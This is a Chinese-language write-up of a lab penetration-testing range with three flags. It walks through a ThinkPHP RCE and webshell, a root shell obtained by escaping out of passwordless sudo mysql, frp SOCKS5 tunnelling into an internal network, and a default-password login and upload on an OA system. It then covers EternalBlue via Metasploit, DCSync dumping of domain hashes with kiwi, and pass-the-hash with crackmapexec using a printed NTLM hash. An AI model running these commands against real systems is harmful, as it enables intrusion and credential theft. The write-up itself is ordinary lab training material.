flag01

访问靶机后有如下

image.png

信息搜集

title图标一眼顶针tp,fscan扫出来是tp5.23 rce漏洞
cf9c46dea116d1908ad7185111994eb.png
image.png
写🐎然后蚁剑

蚁剑

image.png

无密码执行mysql

image.png
发现无密码执行mysql,利用这个执行命令
查找flag

1
sudo mysql -e '\! find / -name flag*'

然后直接cat flag

1
sudo mysql -e '\! cat /root/flag/flag01.txt'

拿到第一段flag

1
flag01: flag{60b53231-

继续信息搜集

flag02

image.png
发现内网网段,直接fscan
image.png

image.png
fscan之后发现信呼OA,尝试进行内网穿透

frp搭建

frpc.ini

1
2
3
4
5
6
7
8
9
[common]
server_addr = [服务器ip]
server_port = 7000

[socks5_to_2] 
type = tcp
remote_port = 10088
plugin = socks5

在客户机启动

1
./frpc -c frpc.ini

frps.ini

1
2
3
4
5
[common]

Bind_addr = 0.0.0.0

bind_port = 7000

在服务器启动

1
./frps -c frps.ini

socks5连接

1
2
[服务器ip]:[remote_port]
[服务器ip]:10088

在这里我使用了proxifier来代理到全局
image.png
然后同时使用
image.png
来到我的kali

信呼OA – 172.22.1.18

admin/admin123登录后进行文件上传
得到
image.png
然后直接蚁剑连接
连接上之后在C:/Users/Administrator/flag/flag02.txt发现flag,进行一个flag2的读取
image.png

flag03

永恒之蓝 – 172.22.1.21 -> 172.22.1.16

我们直接用proxychain4去启动msfconsole
然后丝滑小连招拿到蓝的meterpreter
通过dir C:/Users/Administrator发现这个机器上并没有flag,于是听晨曦✌说有可能是要pth去拿到DC那台机子的shell,所以flag3有可能在DC那里,然后直到这里我才发现flag02的提示说flag03在domain controller里
那我们直接抓哈希

1
2
3
4
load kiwi

kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

image.png
这样我们就拿到了administrator的hash
之后我们直接使用kali中的

1
2
3
4
proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "dir"

proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

image.png
这样我们就拿到了最后一部分flag
那么就到此为止啦

反思

其实按照自己的进度来说还是总体比较顺利,之前学域的时候顾着理论而没有注重实践,这个靶机的pth狠狠提醒了我一手